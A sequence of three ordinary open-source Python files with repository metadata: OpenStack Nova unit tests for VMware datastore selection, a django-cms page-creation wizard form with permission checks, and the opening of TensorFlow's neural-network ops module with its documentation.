result = ds_util.get_datastore(self.session, 'fake-cluster')
self.assertEqual("fake-ds", result.name)
self.assertEqual(units.Ti, result.capacity)
self.assertEqual(500 * units.Gi, result.freespace)
def test_get_datastore_with_regex(self):
# Test with a regex that matches with a datastore
datastore_valid_regex = re.compile(r"^openstack.*\d$")
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake.Datastore("openstack-ds0"))
fake_objects.add_object(fake.Datastore("fake-ds0"))
fake_objects.add_object(fake.Datastore("fake-ds1"))
with self._mock_get_datastore_calls(fake_objects):
result = ds_util.get_datastore(self.session, 'fake-cluster',
datastore_valid_regex)
self.assertEqual("openstack-ds0", result.name)
def test_get_datastore_with_token(self):
regex = re.compile(r"^ds.*\d$")
fake0 = fake.FakeRetrieveResult()
fake0.add_object(fake.Datastore("ds0", 10 * units.Gi, 5 * units.Gi))
fake0.add_object(fake.Datastore("foo", 10 * units.Gi, 9 * units.Gi))
setattr(fake0, 'token', 'token-0')
fake1 = fake.FakeRetrieveResult()
fake1.add_object(fake.Datastore("ds2", 10 * units.Gi, 8 * units.Gi))
fake1.add_object(fake.Datastore("ds3", 10 * units.Gi, 1 * units.Gi))
with self._mock_get_datastore_calls(fake0, fake1):
result = ds_util.get_datastore(self.session, 'fake-cluster', regex)
self.assertEqual("ds2", result.name)
def test_get_datastore_with_list(self):
# Test with a regex containing whitelist of datastores
datastore_valid_regex = re.compile("(openstack-ds0|openstack-ds2)")
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake.Datastore("openstack-ds0"))
fake_objects.add_object(fake.Datastore("openstack-ds1"))
fake_objects.add_object(fake.Datastore("openstack-ds2"))
with self._mock_get_datastore_calls(fake_objects):
result = ds_util.get_datastore(self.session, 'fake-cluster',
datastore_valid_regex)
self.assertNotEqual("openstack-ds1", result.name)
def test_get_datastore_with_regex_error(self):
# Test with a regex that has no match
# Checks if code raises DatastoreNotFound with a specific message
datastore_invalid_regex = re.compile("unknown-ds")
exp_message = ("Datastore regex %s did not match any datastores"
% datastore_invalid_regex.pattern)
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake.Datastore("fake-ds0"))
fake_objects.add_object(fake.Datastore("fake-ds1"))
# assertRaisesRegExp would have been a good choice instead of
# try/catch block, but it's available only from Py 2.7.
try:
with self._mock_get_datastore_calls(fake_objects):
ds_util.get_datastore(self.session, 'fake-cluster',
datastore_invalid_regex)
except exception.DatastoreNotFound as e:
self.assertEqual(exp_message, e.args[0])
else:
self.fail("DatastoreNotFound Exception was not raised with "
"message: %s" % exp_message)
def test_get_datastore_without_datastore(self):
self.assertRaises(exception.DatastoreNotFound,
ds_util.get_datastore,
fake.FakeObjectRetrievalSession(None), cluster="fake-cluster")
def test_get_datastore_inaccessible_ds(self):
data_store = fake.Datastore()
data_store.set("summary.accessible", False)
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(data_store)
with self._mock_get_datastore_calls(fake_objects):
self.assertRaises(exception.DatastoreNotFound,
ds_util.get_datastore,
self.session, 'fake-cluster')
def test_get_datastore_ds_in_maintenance(self):
data_store = fake.Datastore()
data_store.set("summary.maintenanceMode", "inMaintenance")
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(data_store)
with self._mock_get_datastore_calls(fake_objects):
self.assertRaises(exception.DatastoreNotFound,
ds_util.get_datastore,
self.session, 'fake-cluster')
def test_get_datastore_no_host_in_cluster(self):
def fake_call_method(module, method, *args, **kwargs):
return ''
with mock.patch.object(self.session, '_call_method',
fake_call_method):
self.assertRaises(exception.DatastoreNotFound,
ds_util.get_datastore,
self.session, 'fake-cluster')
def _test_is_datastore_valid(self, accessible=True,
maintenance_mode="normal",
type="VMFS",
datastore_regex=None,
ds_types=ds_util.ALL_SUPPORTED_DS_TYPES):
propdict = {}
propdict["summary.accessible"] = accessible
propdict["summary.maintenanceMode"] = maintenance_mode
propdict["summary.type"] = type
propdict["summary.name"] = "ds-1"
return ds_util._is_datastore_valid(propdict, datastore_regex, ds_types)
def test_is_datastore_valid(self):
for ds_type in ds_util.ALL_SUPPORTED_DS_TYPES:
self.assertTrue(self._test_is_datastore_valid(True,
"normal",
ds_type))
def test_is_datastore_valid_inaccessible_ds(self):
self.assertFalse(self._test_is_datastore_valid(False,
"normal",
"VMFS"))
def test_is_datastore_valid_ds_in_maintenance(self):
self.assertFalse(self._test_is_datastore_valid(True,
"inMaintenance",
"VMFS"))
def test_is_datastore_valid_ds_type_invalid(self):
self.assertFalse(self._test_is_datastore_valid(True,
"normal",
"vfat"))
def test_is_datastore_valid_not_matching_regex(self):
datastore_regex = re.compile("ds-2")
self.assertFalse(self._test_is_datastore_valid(True,
"normal",
"VMFS",
datastore_regex))
def test_is_datastore_valid_matching_regex(self):
datastore_regex = re.compile("ds-1")
self.assertTrue(self._test_is_datastore_valid(True,
"normal",
"VMFS",
datastore_regex))
def test_get_connected_hosts_none(self):
with mock.patch.object(self.session,
'_call_method') as _call_method:
hosts = ds_util.get_connected_hosts(self.session,
'fake_datastore')
self.assertEqual([], hosts)
_call_method.assert_called_once_with(
mock.ANY, 'get_object_property',
'fake_datastore', 'host')
def test_get_connected_hosts(self):
host = mock.Mock(spec=object)
host.value = 'fake-host'
host_mount = mock.Mock(spec=object)
host_mount.key = host
host_mounts = mock.Mock(spec=object)
host_mounts.DatastoreHostMount = [host_mount]
with mock.patch.object(self.session, '_call_method',
return_value=host_mounts) as _call_method:
hosts = ds_util.get_connected_hosts(self.session,
'fake_datastore')
self.assertEqual(['fake-host'], hosts)
_call_method.assert_called_once_with(
mock.ANY, 'get_object_property',
'fake_datastore', 'host')
|
{
"content_hash": "62299929583a098c86ad56537d02049c",
"timestamp": "",
"source": "github",
"line_count": 471,
"max_line_length": 79,
"avg_line_length": 45.34819532908705,
"alnum_prop": 0.5480593660751908,
"repo_name": "rahulunair/nova",
"id": "ce10dc430fbf689a5c501c132ae2eca4fce0e26c",
"size": "21968",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "nova/tests/unit/virt/vmwareapi/test_ds_util.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "PHP",
"bytes": "3325"
},
{
"name": "Python",
"bytes": "22804450"
},
{
"name": "Shell",
"bytes": "41649"
},
{
"name": "Smarty",
"bytes": "472764"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django import forms
from django.contrib.sites.models import Site
from django.core.exceptions import PermissionDenied
from django.utils.encoding import smart_text
from django.utils.translation import (
ugettext,
ugettext_lazy as _,
get_language,
)
from cms.api import generate_valid_slug
from cms.constants import PAGE_TYPES_ID
from cms.exceptions import NoPermissionsException
from cms.models import Page, Title
from cms.models.titlemodels import EmptyTitle
from cms.plugin_pool import plugin_pool
from cms.utils import permissions
from cms.utils.compat.dj import is_installed
from cms.utils.urlutils import static_with_version
from cms.utils.conf import get_cms_setting
try:
# djangocms_text_ckeditor is not guaranteed to be available
from djangocms_text_ckeditor.widgets import TextEditorWidget
text_widget = TextEditorWidget
except ImportError:
text_widget = forms.Textarea
def user_has_view_permission(user, page=None):
"""
This code largely duplicates Page.has_view_permission(). We do this because
the source method requires a request object, which isn't appropriate in
this case. Fortunately, the source method (and its dependencies) use the
request object only to get the user object, when it isn't explicitly
provided and for caching permissions. We don't require caching here and we
can explicitly provide the user object.
"""
if not user:
return False
class FakeRequest(object):
pass
fake_request = FakeRequest()
can_see_unrestricted = get_cms_setting('PUBLIC_FOR') == 'all' or (
get_cms_setting('PUBLIC_FOR') == 'staff' and user.is_staff)
# Inherited and direct view permissions
is_restricted = bool(
permissions.get_any_page_view_permissions(fake_request, page))
if not is_restricted and can_see_unrestricted:
return True
elif not user.is_authenticated():
return False
if not is_restricted:
# a global permission was given to the request's user
if permissions.has_global_page_permission(
fake_request, page.site_id, user=user, can_view=True):
return True
else:
# a specific permission was granted to the request's user
if page.get_draft_object().has_generic_permission(
fake_request, "view", user=user):
return True
# The user has a normal django permission to view pages globally
opts = page._meta
codename = '%s.view_%s' % (opts.app_label, opts.object_name.lower())
return user.has_perm(codename)
class PageTypeSelect(forms.widgets.Select):
"""
Special widget for the page_type choice-field. This simply adds some JS for
hiding/showing the content field based on the selection of this select.
"""
class Media:
js = (
'cms/js/modules/jquery.noconflict.pre.js',
'cms/js/dist/bundle.admin.base.min.js',
'cms/js/modules/cms.base.js',
'cms/js/widgets/wizard.pagetypeselect.js',
'cms/js/modules/jquery.noconflict.post.js',
)
js = tuple(map(static_with_version, js))
class BaseCMSPageForm(forms.Form):
title = forms.CharField(
label=_(u'Title'), max_length=255,
help_text=_(u"Provide a title for the new page."))
slug = forms.SlugField(
label=_(u'Slug'), max_length=255, required=False,
help_text=_(u"Leave empty for automatic slug, or override as required.")
)
page_type = forms.ChoiceField(
label=_(u'Page type'), required=False, widget=PageTypeSelect())
content = forms.CharField(
label=_(u'Content'), widget=text_widget, required=False,
help_text=_(u"Optional. If supplied, will be automatically added "
u"within a new text plugin."))
def __init__(self, instance=None, *args, **kwargs):
# Expect instance argument here, as we have to accept some of the
# ModelForm __init__() arguments here for the ModelFormMixin cbv
self.instance = instance
super(BaseCMSPageForm, self).__init__(*args, **kwargs)
if self.page:
site = self.page.site_id
else:
site = Site.objects.get_current()
# Either populate, or remove the page_type field
if 'page_type' in self.fields:
root = Page.objects.filter(publisher_is_draft=True,
reverse_id=PAGE_TYPES_ID,
site=site).first()
if root:
page_types = root.get_descendants()
else:
page_types = Page.objects.none()
if root and page_types:
# Set the choicefield's choices to the various page_types
language = get_language()
type_ids = page_types.values_list('pk', flat=True)
titles = Title.objects.filter(page__in=type_ids,
language=language)
choices = [('', '---------')]
for title in titles:
choices.append((title.page_id, title.title))
self.fields['page_type'].choices = choices
else:
# There are no page_types, so don't bother the user with an
# empty choice field.
del self.fields['page_type']
class CreateCMSPageForm(BaseCMSPageForm):
@staticmethod
def create_page_titles(page, title, languages):
# Import here due to potential circular dependency issues
from cms.api import create_title
for language in languages:
title_obj = page.get_title_obj(language=language, fallback=False)
if isinstance(title_obj, EmptyTitle):
create_title(language, title, page)
@staticmethod
def get_first_placeholder(page):
"""
Returns the first editable, non-static placeholder or None.
"""
for placeholder in page.get_placeholders():
if not placeholder.is_static and placeholder.is_editable:
return placeholder
else:
return None
def clean(self):
"""
Validates that either the slug is provided, or that slugification from
`title` produces a valid slug.
:return:
"""
cleaned_data = super(CreateCMSPageForm, self).clean()
slug = cleaned_data.get("slug")
sub_page = cleaned_data.get("sub_page")
title = cleaned_data.get("title")
if self.page:
if sub_page:
parent = self.page
else:
parent = self.page.parent
else:
parent = None
if slug:
starting_point = slug
elif title:
starting_point = title
else:
starting_point = _("page")
slug = generate_valid_slug(starting_point, parent, self.language_code)
if not slug:
raise forms.ValidationError("Please provide a valid slug.")
cleaned_data["slug"] = slug
return cleaned_data
def save(self, **kwargs):
from cms.api import create_page, add_plugin
from cms.utils.permissions import has_page_add_permission
# Check to see if this user has permissions to make this page. We've
# already checked this when producing a list of wizard entries, but this
# is to prevent people from possible form-hacking.
if 'sub_page' in self.cleaned_data:
sub_page = self.cleaned_data['sub_page']
else:
sub_page = False
if self.page:
if sub_page:
parent = self.page
position = "last-child"
else:
parent = self.page.parent
position = "right"
else:
parent = None
position = "last-child"
# Before we do this, verify this user has perms to do so.
if not (self.user.is_superuser or
has_page_add_permission(self.user, self.page,
position=position,
site=self.page.site)):
raise NoPermissionsException(
_(u"User does not have permission to add page."))
page = create_page(
title=self.cleaned_data['title'],
slug=self.cleaned_data['slug'],
template=get_cms_setting('WIZARD_DEFAULT_TEMPLATE'),
language=self.language_code,
created_by=smart_text(self.user),
parent=parent,
in_navigation=True,
published=False
)
page_type = self.cleaned_data.get("page_type")
if page_type:
copy_target = Page.objects.filter(pk=page_type).first()
else:
copy_target = None
if copy_target:
# If the user selected a page type, copy that.
if not user_has_view_permission(self.user, copy_target):
raise PermissionDenied()
# Copy page attributes
copy_target._copy_attributes(page, clean=True)
page.save()
# Copy contents (for each language)
for lang in copy_target.get_languages():
copy_target._copy_contents(page, lang)
# Copy extensions
from cms.extensions import extension_pool
extension_pool.copy_extensions(copy_target, page)
else:
# If the user provided content, then use that instead.
content = self.cleaned_data.get('content')
plugin_type = get_cms_setting('WIZARD_CONTENT_PLUGIN')
plugin_body = get_cms_setting('WIZARD_CONTENT_PLUGIN_BODY')
if plugin_type in plugin_pool.plugins and plugin_body:
if content and permissions.has_plugin_permission(
self.user, plugin_type, "add"):
placeholder = self.get_first_placeholder(page)
if placeholder:
add_plugin(**{
'placeholder': placeholder,
'plugin_type': plugin_type,
'language': self.language_code,
plugin_body: content,
})
if is_installed('reversion'):
from cms.utils.helpers import make_revision_with_plugins
from cms.admin.pageadmin import INITIAL_COMMENT
from cms.utils.reversion_hacks import create_revision
with create_revision():
make_revision_with_plugins(
obj=page,
user=self.user,
message=ugettext(INITIAL_COMMENT),
)
return page
class CreateCMSSubPageForm(CreateCMSPageForm):
sub_page = forms.BooleanField(initial=True, widget=forms.HiddenInput)
|
{
"content_hash": "e598eea20447c19fe0e073449083ccfd",
"timestamp": "",
"source": "github",
"line_count": 300,
"max_line_length": 80,
"avg_line_length": 36.71666666666667,
"alnum_prop": 0.5893781207444394,
"repo_name": "keimlink/django-cms",
"id": "61f80fe1722faefef678edd9ae641bb222a5e7a4",
"size": "11040",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "cms/forms/wizards.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "128012"
},
{
"name": "HTML",
"bytes": "105180"
},
{
"name": "JavaScript",
"bytes": "667899"
},
{
"name": "Python",
"bytes": "1978594"
},
{
"name": "XSLT",
"bytes": "5917"
}
],
"symlink_target": ""
}
|
"""## Activation Functions
The activation ops provide different types of nonlinearities for use in
neural networks. These include smooth nonlinearities (`sigmoid`,
`tanh`, and `softplus`), continuous but not everywhere differentiable
functions (`relu`, `relu6`, and `relu_x`), and random regularization
(`dropout`).
All activation ops apply componentwise, and produce a tensor of the same
shape as the input tensor.
@@relu
@@relu6
@@softplus
@@dropout
@@bias_add
@@sigmoid
@@tanh
## Convolution
The convolution ops sweep a 2-D filter over a batch of images, applying the
filter to each window of each image of the appropriate size. The different
ops trade off between generic vs. specific filters:
* `conv2d`: Arbitrary filters that can mix channels together.
* `depthwise_conv2d`: Filters that operate on each channel independently.
* `separable_conv2d`: A depthwise spatial filter followed by a pointwise filter.
Note that although these ops are called "convolution", they are strictly
speaking "cross-correlation" since the filter is combined with an input window
without reversing the filter. For details, see [the properties of
cross-correlation](https://en.wikipedia.org/wiki/Cross-correlation#Properties).
The filter is applied to image patches of the same size as the filter and
strided according to the `strides` argument. `strides = [1, 1, 1, 1]` applies
the filter to a patch at every offset, `strides = [1, 2, 2, 1]` applies the
filter to every other image patch in each dimension, etc.
Ignoring channels for the moment, assume that the 4-D `input` has shape
`[batch, in_height, in_width, ...]` and the 4-D `filter` has shape
`[filter_height, filter_width, ...]`, then the spatial semantics of the
convolution ops are as follows: first, according to the padding scheme chosen
as `'SAME'` or `'VALID'`, the output size and the padding pixels are computed.
For the `'SAME'` padding, the output height and width are computed as:
out_height = ceil(float(in_height) / float(strides[1]))
    out_width = ceil(float(in_width) / float(strides[2]))
and the padding on the top and left are computed as:
pad_along_height = ((out_height - 1) * strides[1] +
filter_height - in_height)
pad_along_width = ((out_width - 1) * strides[2] +
filter_width - in_width)
pad_top = pad_along_height / 2
pad_left = pad_along_width / 2
Note that the division by 2 means that there might be cases when the padding on
both sides (top vs bottom, right vs left) are off by one. In this case, the
bottom and right sides always get the one additional padded pixel. For example,
when `pad_along_height` is 5, we pad 2 pixels at the top and 3 pixels at the
bottom. Note that this is different from existing libraries such as cuDNN and
Caffe, which explicitly specify the number of padded pixels and always pad the
same number of pixels on both sides.
For the `'VALID'` padding, the output height and width are computed as:
out_height = ceil(float(in_height - filter_height + 1) / float(strides[1]))
    out_width = ceil(float(in_width - filter_width + 1) / float(strides[2]))
and the padding values are always zero. The output is then computed as
output[b, i, j, :] =
sum_{di, dj} input[b, strides[1] * i + di - pad_top,
strides[2] * j + dj - pad_left, ...] *
filter[di, dj, ...]
where any value outside the original input image region is considered zero
(i.e. we pad zero values around the border of the image).
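As a purely illustrative calculation, take `in_height = 5`, `filter_height = 3`
and `strides[1] = 2`. Under `'SAME'` padding,
    out_height = ceil(5 / 2) = 3
    pad_along_height = (3 - 1) * 2 + 3 - 5 = 2
    pad_top = 1, pad_bottom = 1
while under `'VALID'` padding,
    out_height = ceil((5 - 3 + 1) / 2) = 2
and no pixels are padded at all.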
Since `input` is 4-D, each `input[b, i, j, :]` is a vector. For `conv2d`, these
vectors are multiplied by the `filter[di, dj, :, :]` matrices to produce new
vectors. For `depthwise_conv2d`, each scalar component `input[b, i, j, k]`
is multiplied by a vector `filter[di, dj, k]`, and all the vectors are
concatenated.
@@conv2d
@@depthwise_conv2d
@@separable_conv2d
## Pooling
The pooling ops sweep a rectangular window over the input tensor, computing a
reduction operation for each window (average, max, or max with argmax). Each
pooling op uses rectangular windows of size `ksize` separated by offset
`strides`. For example, if `strides` is all ones, every window is used; if
`strides` is all twos, every other window is used in each dimension; and so on.
In detail, the output is
output[i] = reduce(value[strides * i:strides * i + ksize])
where the indices also take into consideration the padding values. Please refer
to the `Convolution` section for details about the padding calculation.
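For example (an illustrative sketch; `value` is a placeholder tensor), max
pooling a `[1, 4, 4, 1]` input over non-overlapping 2x2 windows reduces each
window to its maximum and produces a `[1, 2, 2, 1]` output:
    out = tf.nn.max_pool(value, ksize=[1, 2, 2, 1],
                         strides=[1, 2, 2, 1], padding='VALID')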
@@avg_pool
@@max_pool
@@max_pool_with_argmax
## Normalization
Normalization is useful to prevent neurons from saturating when inputs may
have varying scale, and to aid generalization.
@@l2_normalize
@@local_response_normalization
@@moments
## Losses
The loss ops measure error between two tensors, or between a tensor and zero.
These can be used for measuring accuracy of a network in a regression task
or for regularization purposes (weight decay).
@@l2_loss
## Classification
TensorFlow provides several operations that help you perform classification.
@@sigmoid_cross_entropy_with_logits
@@softmax
@@softmax_cross_entropy_with_logits
## Embeddings
TensorFlow provides library support for looking up values in embedding
tensors.
@@embedding_lookup
## Evaluation
The evaluation ops are useful for measuring the performance of a network.
Since they are nondifferentiable, they are typically used at evaluation time.
@@top_k
@@in_top_k
## Candidate Sampling
Do you want to train a multiclass or multilabel model with thousands
or millions of output classes (for example, a language model with a
large vocabulary)? Training with a full Softmax is slow in this case,
since all of the classes are evaluated for every training example.
Candidate Sampling training algorithms can speed up your step times by
only considering a small randomly-chosen subset of contrastive classes
(called candidates) for each batch of training examples.
See our [Candidate Sampling Algorithms Reference]
(../../extras/candidate_sampling.pdf)
### Sampled Loss Functions
TensorFlow provides the following sampled loss functions for faster training.
@@nce_loss
@@sampled_softmax_loss
### Candidate Samplers
TensorFlow provides the following samplers for randomly sampling candidate
classes when using one of the sampled loss functions above.
@@uniform_candidate_sampler
@@log_uniform_candidate_sampler
@@learned_unigram_candidate_sampler
@@fixed_unigram_candidate_sampler
### Miscellaneous candidate sampling utilities
@@compute_accidental_hits
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import candidate_sampling_ops
from tensorflow.python.ops import constant_op
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import embedding_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_grad
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import numerics
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops.math_ops import sigmoid
from tensorflow.python.ops.math_ops import tanh
# Bring more nn-associated functionality into this package.
from tensorflow.python.ops.nn_ops import *
from tensorflow.python.ops.candidate_sampling_ops import *
from tensorflow.python.ops.embedding_ops import *
def sigmoid_cross_entropy_with_logits(logits, targets, name=None):
"""Computes sigmoid cross entropy given `logits`.
Measures the probability error in discrete classification tasks in which each
class is independent and not mutually exclusive. For instance, one could
perform multilabel classification where a picture can contain both an elephant
and a dog at the same time.
For brevity, let `x = logits`, `z = targets`. The logistic loss is
x - x * z + log(1 + exp(-x))
To ensure stability and avoid overflow, the implementation uses
max(x, 0) - x * z + log(1 + exp(-abs(x)))
`logits` and `targets` must have the same type and shape.
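  As a quick check (an illustrative NumPy sketch, assuming `import numpy as
  np`; it is not part of this module), the two forms agree wherever the naive
  form does not overflow:
      x, z = np.array([-3., 0.5, 4.]), np.array([1., 0., 1.])
      naive = x - x * z + np.log1p(np.exp(-x))
      stable = np.maximum(x, 0) - x * z + np.log1p(np.exp(-np.abs(x)))
      np.testing.assert_allclose(naive, stable)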
Args:
logits: A `Tensor` of type `float32` or `float64`.
targets: A `Tensor` of the same type and shape as `logits`.
name: A name for the operation (optional).
Returns:
A `Tensor` of the same shape as `logits` with the componentwise
logistic losses.
"""
with ops.op_scope([logits, targets], name, "logistic_loss") as name:
logits = ops.convert_to_tensor(logits, name="logits")
targets = ops.convert_to_tensor(targets, name="targets")
# The logistic loss formula from above is
# x - x * z + log(1 + exp(-x))
# For x < 0, a more numerically stable formula is
# -x * z + log(1 + exp(x))
# To avoid branching, we use the combined version
# max(x, 0) - x * z + log(1 + exp(-abs(x)))
return math_ops.add(nn_ops.relu(logits) - logits * targets,
math_ops.log(1 + math_ops.exp(-math_ops.abs(logits))),
name=name)
def xw_plus_b(x, weights, biases, name=None):
"""Computes matmul(x, weights) + biases.
Args:
x: a 2D tensor. Dimensions typically: batch, in_units
weights: a 2D tensor. Dimensions typically: in_units, out_units
biases: a 1D tensor. Dimensions: out_units
name: A name for the operation (optional). If not specified
"wx_plus_b" is used.
Returns:
A 2-D Tensor computing matmul(x, weights) + biases.
Dimensions typically: batch, out_units.
"""
with ops.op_scope([x, weights, biases], name, "xw_plus_b") as name:
x = ops.convert_to_tensor(x, name="x")
weights = ops.convert_to_tensor(weights, name="weights")
biases = ops.convert_to_tensor(biases, name="biases")
mm = math_ops.matmul(x, weights)
return nn_ops.bias_add(mm, biases, name=name)
def relu_layer(x, weights, biases, name=None):
"""Computes Relu(x * weight + biases).
Args:
x: a 2D tensor. Dimensions typically: batch, in_units
weights: a 2D tensor. Dimensions typically: in_units, out_units
biases: a 1D tensor. Dimensions: out_units
name: A name for the operation (optional). If not specified
"nn_relu_layer" is used.
Returns:
A 2-D Tensor computing relu(matmul(x, weights) + biases).
Dimensions typically: batch, out_units.
"""
with ops.op_scope([x, weights, biases], name, "relu_layer") as name:
x = ops.convert_to_tensor(x, name="x")
weights = ops.convert_to_tensor(weights, name="weights")
biases = ops.convert_to_tensor(biases, name="biases")
xw_plus_b = nn_ops.bias_add(math_ops.matmul(x, weights), biases)
return nn_ops.relu(xw_plus_b, name=name)
def l2_normalize(x, dim, epsilon=1e-12, name=None):
"""Normalizes along dimension `dim` using an L2 norm.
For a 1-D tensor with `dim = 0`, computes
output = x / sqrt(max(sum(x**2), epsilon))
For `x` with more dimensions, independently normalizes each 1-D slice along
dimension `dim`.
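  For example (illustrative values only), for `x = [3.0, 4.0]` and `dim = 0`,
  `sum(x**2)` is 25, so the output is `[3.0 / 5.0, 4.0 / 5.0] = [0.6, 0.8]`.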
Args:
x: A `Tensor`.
dim: Dimension along which to normalize.
epsilon: A lower bound value for the norm. Will use `sqrt(epsilon)` as the
divisor if `norm < sqrt(epsilon)`.
name: A name for this operation (optional).
Returns:
A `Tensor` with the same shape as `x`.
"""
with ops.op_scope([x], name, "l2_normalize") as name:
x = ops.convert_to_tensor(x, name="x")
square_sum = math_ops.reduce_sum(math_ops.square(x), [dim], keep_dims=True)
x_inv_norm = math_ops.rsqrt(math_ops.maximum(square_sum, epsilon))
return math_ops.mul(x, x_inv_norm, name=name)
def zero_fraction(value, name=None):
"""Returns the fraction of zeros in `value`.
If `value` is empty, the result is `nan`.
This is useful in summaries to measure and report sparsity. For example,
      z = tf.nn.relu(...)
      summ = tf.scalar_summary('sparsity', tf.nn.zero_fraction(z))
Args:
value: A tensor of numeric type.
name: A name for the operation (optional).
Returns:
The fraction of zeros in `value`, with type `float32`.
"""
with ops.op_scope([value], name, "zero_fraction"):
value = ops.convert_to_tensor(value, name="value")
zero = constant_op.constant(0, dtype=value.dtype, name="zero")
return math_ops.reduce_mean(math_ops.cast(math_ops.equal(value, zero),
dtypes.float32))
def dropout(x, keep_prob, noise_shape=None, seed=None, name=None):
"""Computes dropout.
With probability `keep_prob`, outputs the input element scaled up by
`1 / keep_prob`, otherwise outputs `0`. The scaling is so that the expected
sum is unchanged.
By default, each element is kept or dropped independently. If `noise_shape`
is specified, it must be
[broadcastable](http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html)
to the shape of `x`, and only dimensions with `noise_shape[i] == shape(x)[i]`
will make independent decisions. For example, if `shape(x) = [k, l, m, n]`
and `noise_shape = [k, 1, 1, n]`, each batch and channel component will be
kept independently and each row and column will be kept or not kept together.
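  For instance (an illustrative sketch; `x`, `k` and `n` are placeholders),
  the following keeps or drops all rows and columns of a `[k, l, m, n]` input
  together, deciding independently per batch entry and per channel:
      y = tf.nn.dropout(x, keep_prob=0.5, noise_shape=[k, 1, 1, n])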
Args:
x: A tensor.
keep_prob: A scalar `Tensor` with the same type as x. The probability
that each element is kept.
noise_shape: A 1-D `Tensor` of type `int32`, representing the
shape for randomly generated keep/drop flags.
seed: A Python integer. Used to create random seeds. See
[`set_random_seed`](../../api_docs/python/constant_op.md#set_random_seed)
for behavior.
name: A name for this operation (optional).
Returns:
    A Tensor of the same shape as `x`.
Raises:
ValueError: If `keep_prob` is not in `(0, 1]`.
"""
with ops.op_scope([x], name, "dropout") as name:
x = ops.convert_to_tensor(x, name="x")
if isinstance(keep_prob, float) and not(0 < keep_prob <= 1):
raise ValueError("keep_prob must be a scalar tensor or a float in the "
"range (0, 1], got %g" % keep_prob)
keep_prob = ops.convert_to_tensor(
keep_prob, dtype=x.dtype, name="keep_prob")
keep_prob.get_shape().assert_is_compatible_with(tensor_shape.scalar())
noise_shape = noise_shape or array_ops.shape(x)
# uniform [keep_prob, 1.0 + keep_prob)
random_tensor = keep_prob
random_tensor += random_ops.random_uniform(
noise_shape, seed=seed, dtype=x.dtype)
# 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
binary_tensor = math_ops.floor(random_tensor)
ret = x * math_ops.inv(keep_prob) * binary_tensor
ret.set_shape(x.get_shape())
return ret
def depthwise_conv2d(input, filter, strides, padding, name=None):
"""Depthwise 2-D convolution.
Given an input tensor of shape `[batch, in_height, in_width, in_channels]`
and a filter tensor of shape
`[filter_height, filter_width, in_channels, channel_multiplier]`
containing `in_channels` convolutional filters of depth 1, `depthwise_conv2d`
applies a different filter to each input channel (expanding from 1 channel
to `channel_multiplier` channels for each), then concatenates the results
together. The output has `in_channels * channel_multiplier` channels.
In detail,
output[b, i, j, k * channel_multiplier + q] =
sum_{di, dj} input[b, strides[1] * i + di, strides[2] * j + dj, k] *
filter[di, dj, k, q]
Must have `strides[0] = strides[3] = 1`. For the most common case of the
same horizontal and vertical strides, `strides = [1, stride, stride, 1]`.
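  As an illustrative shape example, a `[1, 8, 8, 3]` input and a
  `[3, 3, 3, 2]` filter with `strides = [1, 1, 1, 1]` and `'SAME'` padding
  produce a `[1, 8, 8, 3 * 2] = [1, 8, 8, 6]` output.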
Args:
input: 4-D with shape `[batch, in_height, in_width, in_channels]`.
filter: 4-D with shape
`[filter_height, filter_width, in_channels, channel_multiplier]`.
strides: 1-D of size 4. The stride of the sliding window for each
dimension of `input`.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
name: A name for this operation (optional).
Returns:
A 4-D `Tensor` of shape
`[batch, out_height, out_width, in_channels * channel_multiplier].`
"""
with ops.op_scope([input, filter], name, "depthwise") as name:
input = ops.convert_to_tensor(input, name="tensor_in")
filter = ops.convert_to_tensor(filter, name="filter_in")
# A shape is required to statically compute the number of separable filters.
if filter.get_shape().ndims is not None:
assert len(filter.get_shape()) == 4
in_channels = filter.get_shape()[2]
# Sanity checks, if shape information is available for the inputs.
if input.get_shape().ndims is not None:
assert len(input.get_shape()) == 4
assert input.get_shape()[3] == in_channels, (
"Mismatched input depth %d and number of depthwise filters %d." % (
input.get_shape()[3].value, in_channels))
else:
assert input.get_shape().ndims is not None, (
"Either tensor must provide static shape information.")
assert input.get_shape().ndims == 4
in_channels = input.get_shape()[3]
if in_channels == 1:
return nn_ops.conv2d(input, filter, strides, padding, name=name)
else:
# Create one separate convolution per channel.
convs = []
for channel in xrange(in_channels):
with ops.name_scope("depth%d" % channel) as channel_scope:
t_in = array_ops.slice(input, [0, 0, 0, channel], [-1, -1, -1, 1],
name="slice_inputs")
f_in = array_ops.slice(filter, [0, 0, channel, 0], [-1, -1, 1, -1],
name="slice_params")
convs.append(nn_ops.conv2d(t_in, f_in,
strides, padding, name=channel_scope))
# Concatenate the per-channel convolutions along the channel dimension.
return array_ops.concat(3, convs, name=name)
def separable_conv2d(input, depthwise_filter, pointwise_filter, strides,
padding,
name=None):
"""2-D convolution with separable filters.
Performs a depthwise convolution that acts separately on channels followed by
a pointwise convolution that mixes channels. Note that this is separability
between dimensions `[1, 2]` and `3`, not spatial separability between
dimensions `1` and `2`.
In detail,
      output[b, i, j, k] = sum_{di, dj, q, r}
input[b, strides[1] * i + di, strides[2] * j + dj, q] *
depthwise_filter[di, dj, q, r] *
pointwise_filter[0, 0, q * channel_multiplier + r, k]
`strides` controls the strides for the depthwise convolution only, since
the pointwise convolution has implicit strides of `[1, 1, 1, 1]`. Must have
